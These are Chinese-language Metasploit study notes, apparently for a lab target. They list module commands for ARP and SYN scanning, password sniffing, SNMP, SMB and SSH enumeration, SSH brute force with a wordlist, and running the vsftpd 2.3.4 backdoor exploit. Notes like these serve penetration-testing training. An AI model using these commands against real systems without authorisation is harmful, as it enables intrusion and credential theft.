基于tcp协议收集
1.利用tcp做信息收集
use auxiliary/scanner/discovery/arp_sweep
设置相关属性 rhosts:目标ip therads:线程数
2.半连接方式扫描停tcp接口
use auxiliary/scanner/portscan/syn
设置相关属性 rhosts therads
3.执行密码嗅探
search psnuffle
use auxiliary/sniffer/psnuffle
基于snmp协议收集
需要开启靶机的snmp才可以查询到,方法见文档
use auxiliary/scanner/snmp/snmp_enum
基于smb协议收集信息
扫描目标版本号
use auxiliary/scanner/smb/smb_version
设置rhosts目标ip 多个目标之间用逗号加空格隔开
如果要查看目标主机的共享文件的信息 需要提前打开目标主机的共享文件功能 文件 共享 设置
枚举目标主机共享的内容
use auxiliary/scanner/smb/smb_enumshares
show options
扫描系统用户信息 SID枚举
use auxiliary/scanner/smb/smb_lookupsid
show options
基于ssh协议收集信息
查看ssh服务的版本信息
use auxiliary/scanner/ssh/ssh_version
show options
对ssh暴力破解
use auxiliary/scanner/ssh/ssh_login
设置目标ip 设置字典路径 set USERPASS_FILE /usr/share/metasploitframework/data/wordlists/root_userpass.txt
基于FTP协议收集信息
加载ftp服务版本扫描模块
use auxiliary/scanner/ftp/ftp_version
拿到ftp版本号以后查询对应的攻击模块
search 2.3.4 寻找带ftp的攻击模块
use exploit/unix/ftp/vsftpd_234_backdoor
设置目标 run
